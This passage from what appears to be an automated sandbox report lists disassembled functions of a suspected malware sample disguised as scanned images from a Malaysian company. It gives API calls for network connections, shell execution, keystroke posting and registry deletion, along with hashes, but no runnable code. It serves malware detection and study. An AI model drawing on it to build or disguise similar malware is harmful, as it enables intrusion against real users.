                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _memcmp
                                                        • String ID:
                                                        • API String ID: 2931989736-0
                                                        • Opcode ID: fe8866625a95aa1b43db60759e3e1cc45c9f86e5af6f164bbdd018a8f85de702
                                                        • Instruction ID: 77588b3b1585178b3aeeb78dbed74aabdaa3ec7ab5b53ce1763ea27f8671298d
                                                        • Opcode Fuzzy Hash: fe8866625a95aa1b43db60759e3e1cc45c9f86e5af6f164bbdd018a8f85de702
                                                        • Instruction Fuzzy Hash: 9421C275600205FBE210A6209E42FBB77ACAF513B4F44C129FD0D96287F751DE1282E5
                                                        Function 00A8ED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A29997: __itow.LIBCMT ref: 00A299C2
                                                          • Part of subcall function 00A29997: __swprintf.LIBCMT ref: 00A29A0C
                                                          • Part of subcall function 00A3FEC6: _wcscpy.LIBCMT ref: 00A3FEE9
                                                        • _wcstok.LIBCMT ref: 00A8EEFF
                                                        • _wcscpy.LIBCMT ref: 00A8EF8E
                                                        • _memset.LIBCMT ref: 00A8EFC1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                        • String ID: X
                                                        • API String ID: 774024439-3081909835
                                                        • Opcode ID: f355f5c236fa1b38f6eddf205f3d52d2e721c4a83ef25b0f87330783107276c0
                                                        • Instruction ID: b4be5a47bf565b472d7e67c454adebbe5b93f621adc199e0ebb2005c428f29a1
                                                        • Opcode Fuzzy Hash: f355f5c236fa1b38f6eddf205f3d52d2e721c4a83ef25b0f87330783107276c0
                                                        • Instruction Fuzzy Hash: 5EC15C755083119FC724EF28DA85A6BB7E4BF84310F04497DF999972A2DB30ED45CB82
                                                        Function 00A96E17 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00A96F14
                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00A96F35
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00A96F48
                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 00A96FFE
                                                        • inet_ntoa.WSOCK32(?), ref: 00A96FBB
                                                          • Part of subcall function 00A7AE14: _strlen.LIBCMT ref: 00A7AE1E
                                                          • Part of subcall function 00A7AE14: _memmove.LIBCMT ref: 00A7AE40
                                                        • _strlen.LIBCMT ref: 00A97058
                                                        • _memmove.LIBCMT ref: 00A970C1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                        • String ID:
                                                        • API String ID: 3619996494-0
                                                        • Opcode ID: 1f07da7bfd553e626ec86d173149391cb143e17e7e6fbab96982fb1b6b147151
                                                        • Instruction ID: eb75d0178904a703066177599a60b754a86efdc6d513a9ebc113f8d3216bde93
                                                        • Opcode Fuzzy Hash: 1f07da7bfd553e626ec86d173149391cb143e17e7e6fbab96982fb1b6b147151
                                                        • Instruction Fuzzy Hash: 5F81D231608310AFDB14EB28DD86F6FB3E9AF84B14F148929F5559B292DB70DD01C7A1
                                                        Function 00A21424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 75afde177dcb68e69d915f2b94104c1b268103628278374b2c81292b32c5ee30
                                                        • Instruction ID: 4fc560ebfb5df50b7f83ba1c60d90efd1c804be9caa58dbda771a11b82d9dc70
                                                        • Opcode Fuzzy Hash: 75afde177dcb68e69d915f2b94104c1b268103628278374b2c81292b32c5ee30
                                                        • Instruction Fuzzy Hash: 93718D70900119EFCB04DF98DC89ABEBB79FF95311F148169F915AA251C734AA51CFA0
                                                        Function 00A9F732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A9F75C
                                                        • _memset.LIBCMT ref: 00A9F825
                                                        • ShellExecuteExW.SHELL32(?), ref: 00A9F86A
                                                          • Part of subcall function 00A29997: __itow.LIBCMT ref: 00A299C2
                                                          • Part of subcall function 00A29997: __swprintf.LIBCMT ref: 00A29A0C
                                                          • Part of subcall function 00A3FEC6: _wcscpy.LIBCMT ref: 00A3FEE9
                                                        • GetProcessId.KERNEL32(00000000), ref: 00A9F8E1
                                                        • CloseHandle.KERNEL32(00000000), ref: 00A9F910
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                        • String ID: @
                                                        • API String ID: 3522835683-2766056989
                                                        • Opcode ID: 67cf644fd868c03d9430c3ff270c4cd93571bce039cedbbedfb4c426024df6e4
                                                        • Instruction ID: 060530e0a3f461527447fccd97f907703d87f07557711e693b0d2fb271400814
                                                        • Opcode Fuzzy Hash: 67cf644fd868c03d9430c3ff270c4cd93571bce039cedbbedfb4c426024df6e4
                                                        • Instruction Fuzzy Hash: F761AE75A00629DFCF14DFA8D6819AEBBF4FF48710F148469E856AB351CB31AD41CB90
                                                        Function 00A8145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetParent.USER32(?), ref: 00A8149C
                                                        • GetKeyboardState.USER32(?), ref: 00A814B1
                                                        • SetKeyboardState.USER32(?), ref: 00A81512
                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00A81540
                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00A8155F
                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00A815A5
                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00A815C8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: f00e747cad511b08c31c8169eaa3db6aa575a04a40f3d65ebddbf69457d5a3bb
                                                        • Instruction ID: 5413b3e107e814b411e808a5fb88b04d2181a341da58b7ecc5947e0c5361c7ea
                                                        • Opcode Fuzzy Hash: f00e747cad511b08c31c8169eaa3db6aa575a04a40f3d65ebddbf69457d5a3bb
                                                        • Instruction Fuzzy Hash: 5951F4A0A047D63EFB3A63748C45BBA7FAD6B46304F088489E1D5858C2D3D8DC96D750
                                                        Function 00A81276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetParent.USER32(00000000), ref: 00A812B5
                                                        • GetKeyboardState.USER32(?), ref: 00A812CA
                                                        • SetKeyboardState.USER32(?), ref: 00A8132B
                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00A81357
                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00A81374
                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00A813B8
                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00A813D9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: 8d38db62d38b86ddeff96a94e1886074580398df2859024cba70add9cd0f328d
                                                        • Instruction ID: b767bc73b9fead58c7b10726f4a218fee6c979b8f5a8ad69cff6dbce8feb50a5
                                                        • Opcode Fuzzy Hash: 8d38db62d38b86ddeff96a94e1886074580398df2859024cba70add9cd0f328d
                                                        • Instruction Fuzzy Hash: BB5106A09047D53DFB36A3748C45BBABFADAF06300F088589E1D58A8C2D395EC96D750
                                                        Function 00A8589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _wcsncpy$LocalTime
                                                        • String ID:
                                                        • API String ID: 2945705084-0
                                                        • Opcode ID: 90f7a734781774dc2714ca061124adb9eb9a5a339d679163317ef37e79683ef1
                                                        • Instruction ID: d5d4ecec96075985019db9711dcedb1e16df2a382753a01795c6fa6a891d0b6f
                                                        • Opcode Fuzzy Hash: 90f7a734781774dc2714ca061124adb9eb9a5a339d679163317ef37e79683ef1
                                                        • Instruction Fuzzy Hash: 0841B16AC20218B6CB50FBB5C88AACFB7AC9F44310F508452F958E3121F734E714C7A9
                                                        Function 00AAA2C5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @U=u
                                                        • API String ID: 0-2594219639
                                                        • Opcode ID: 158714e9fcbbea87aee029853258157e68a270aec9e48d751c279554380dda89
                                                        • Instruction ID: 2cc7b4bc68f663b16152aa8a19bf597a525a998f31b6361edd1caedffaa0e7d7
                                                        • Opcode Fuzzy Hash: 158714e9fcbbea87aee029853258157e68a270aec9e48d751c279554380dda89
                                                        • Instruction Fuzzy Hash: 9541F539900205AFDB24DF68CC48FB9BBF4EB2B310F140165F856AB2E1D770AD41DA61
                                                        Function 00A838AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A848AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A838D3,?), ref: 00A848C7
                                                          • Part of subcall function 00A848AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A838D3,?), ref: 00A848E0
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00A838F3
                                                        • _wcscmp.LIBCMT ref: 00A8390F
                                                        • MoveFileW.KERNEL32(?,?), ref: 00A83927
                                                        • _wcscat.LIBCMT ref: 00A8396F
                                                        • SHFileOperationW.SHELL32(?), ref: 00A839DB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                        • String ID: \*.*
                                                        • API String ID: 1377345388-1173974218
                                                        • Opcode ID: 58bf33a39c171a33fb590a4a13db394df18581ea7a66549c6362b478ba822e81
                                                        • Instruction ID: 7dafb1000c4066f21d453beeef4e230607d31099f89e169e1eb1829b18c0b725
                                                        • Opcode Fuzzy Hash: 58bf33a39c171a33fb590a4a13db394df18581ea7a66549c6362b478ba822e81
                                                        • Instruction Fuzzy Hash: 70419DB24083459ECB61FF64C591AEFB7ECAF88740F40192EF48AC3251EA74D688C752
                                                        Function 00AA7500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00AA7519
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AA75C0
                                                        • IsMenu.USER32(?), ref: 00AA75D8
                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AA7620
                                                        • DrawMenuBar.USER32 ref: 00AA7633
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$DrawInfoInsert_memset
                                                        • String ID: 0
                                                        • API String ID: 3866635326-4108050209
                                                        • Opcode ID: c686a510a4fa63ea657d84657731153d1015a46211c13be8ad969a0b5d0af990
                                                        • Instruction ID: 0625c16aa04a719d9c34085dd5665df5db3248f5bb154bcba04dbacd0d2e2228
                                                        • Opcode Fuzzy Hash: c686a510a4fa63ea657d84657731153d1015a46211c13be8ad969a0b5d0af990
                                                        • Instruction Fuzzy Hash: 4F412975A04649EFDB20DF94D884EAEBBF9FB0A350F048129E9559B290DB30ED51CF90
                                                        Function 00AA122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00AA125C
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AA1286
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00AA133D
                                                          • Part of subcall function 00AA122D: RegCloseKey.ADVAPI32(?), ref: 00AA12A3
                                                          • Part of subcall function 00AA122D: FreeLibrary.KERNEL32(?), ref: 00AA12F5
                                                          • Part of subcall function 00AA122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00AA1318
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00AA12E0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                        • String ID:
                                                        • API String ID: 395352322-0
                                                        • Opcode ID: eecc08fdb94a68f0cab16cbdaa4b2c90a54bd04169f71dfab0653c9936b4e46e
                                                        • Instruction ID: fac696b7bc6bc2a114604f0ef0d7d57b7102945926125ca08c49eb09d66fddd7
                                                        • Opcode Fuzzy Hash: eecc08fdb94a68f0cab16cbdaa4b2c90a54bd04169f71dfab0653c9936b4e46e
                                                        • Instruction Fuzzy Hash: 853119B1901109BFDF14DFD0DC89AFEB7BCEB0A300F00016AE512E7191EB749E499AA4
                                                        Function 00A96486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A980A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00A980CB
                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00A964D9
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00A964E8
                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00A96521
                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00A9652A
                                                        • WSAGetLastError.WSOCK32 ref: 00A96534
                                                        • closesocket.WSOCK32(00000000), ref: 00A9655D
                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00A96576
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 910771015-0
                                                        • Opcode ID: 300072af5a49d983f7a231eab73b09b2eb9bf29dfb1d21cb5855b7ef6be40de4
                                                        • Instruction ID: 851ea27286fd0b4aa3a4abffb7df2e7a7b2deb67cba7eb2b5fbd099a826328b3
                                                        • Opcode Fuzzy Hash: 300072af5a49d983f7a231eab73b09b2eb9bf29dfb1d21cb5855b7ef6be40de4
                                                        • Instruction Fuzzy Hash: 87319E31600218AFDF10AFA4DD85BBA7BE8EF49764F048029F90997291DB74AD05CBA1
                                                        Function 00A79372 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 94windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A27F41: _memmove.LIBCMT ref: 00A27F82
                                                          • Part of subcall function 00A7B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00A7B0E7
                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00A793F6
                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00A79409
                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00A79439
                                                          • Part of subcall function 00A27D2C: _memmove.LIBCMT ref: 00A27D66
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$_memmove$ClassName
                                                        • String ID: @U=u$ComboBox$ListBox
                                                        • API String ID: 365058703-2258501812
                                                        • Opcode ID: 21a1c9e248db9d5b256c37282a533bb00c3900655210b6a69d0e15ddd62e7b01
                                                        • Instruction ID: 7c459304df2d2d76409074fe8bd49069fd0db88e32a9b3adfb2e8d8aeee1c496
                                                        • Opcode Fuzzy Hash: 21a1c9e248db9d5b256c37282a533bb00c3900655210b6a69d0e15ddd62e7b01
                                                        • Instruction Fuzzy Hash: 8A21F671900104BFDB18ABB4DD86DFFB778EF45350B14C52AF929972E1DB354E0A9620
                                                        Function 00A7E0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A7E0FA
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A7E120
                                                        • SysAllocString.OLEAUT32(00000000), ref: 00A7E123
                                                        • SysAllocString.OLEAUT32 ref: 00A7E144
                                                        • SysFreeString.OLEAUT32 ref: 00A7E14D
                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00A7E167
                                                        • SysAllocString.OLEAUT32(?), ref: 00A7E175
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                        • String ID:
                                                        • API String ID: 3761583154-0
                                                        • Opcode ID: 9ad4f600f6ea179408f3292df07f361297fe0c0445670343e3cac3c0ad9295d4
